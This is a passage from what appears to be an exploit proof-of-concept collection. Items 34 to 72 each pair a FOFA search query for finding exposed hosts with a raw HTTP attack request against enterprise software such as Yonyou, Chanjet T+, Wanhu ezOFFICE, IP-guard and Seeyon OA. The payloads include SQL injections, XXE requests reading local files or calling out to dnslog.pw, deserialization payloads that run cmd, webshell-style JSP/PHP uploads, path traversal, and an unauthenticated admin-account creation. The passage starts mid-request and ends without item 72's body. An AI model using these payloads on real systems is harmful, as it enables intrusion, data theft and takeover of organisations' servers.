Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the packet below to the target; it executes a command that writes the specified string into the specified file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The sql parameter is base64 for `select 1,user(),3`: the exported spreadsheet carries the database user, and any statement can be substituted.

61. Zheda Enter (浙大恩特) customer resource management system fileupload.jsp arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

The body is stored under the name given in the filename parameter, so the .jsp extension is attacker-controlled; the POC writes a harmless marker string rather than a shell.

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The page parameter of the bundled FlexPaper view.php is concatenated into a shell command; `||` breaks out of it and the echo writes a marker file next to the script. Then fetch it:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

The path parameter is not confined to the download directory; `../config.ini` comes back as the download.

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

Time-based: the sId value of the SOAP GetOSpById call is injectable, and a response delayed by about five seconds confirms it.

65. Youkate (优卡特) 脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 permission bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

The addOperators function is reachable without a session. This POC is not read-only: it leaves a new operator account (role 00) on the target, so remove it after the check.

66. Wanhu ezOFFICE (万户ezOFFICE) SendFileCheckTemplateEdit.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

UNION-based: the string 6cfe798ba8e5b85feb50164c59f4bec9 (MD5 of 102103122) appearing in the response, around lines 42 and 43 of the HTML, confirms the injection.

67. Wanhu ezOFFICE (万户ezOFFICE) wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
newdocId and filename set the name of the written file, dir the directory it is written to, and fileType its extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then served at /defaultroot/platform/portal/layout/apoxkq.jsp and prints sasdfghjkj.

68. Wanhu ezOFFICE (万户ezOFFICE) wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The `;.js` suffix is a path-parameter trick: an extension-based access filter sees a static .js resource while the servlet container still dispatches to the JSP. Time-based: a delay of about five seconds confirms the injection.

69. Wanhu ezOFFICE (万户ezOFFICE) contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Same `;.js` bypass and time-based check as item 68, this time through the gd_startUserCode parameter.

70. Wanhu ezEIP (万户ezEIP) success.aspx command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

The SID header carries the command, base64-encoded (here `type C:\Windows\win.ini`); the 16 KB __VIEWSTATE value, elided as PAYLOAD, is the deserialization payload that makes the server run it.

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

Time-based, through the accId parameter of the login page: a delay of about five seconds confirms it.

72. Seeyon OA (致远OA) getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 581
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

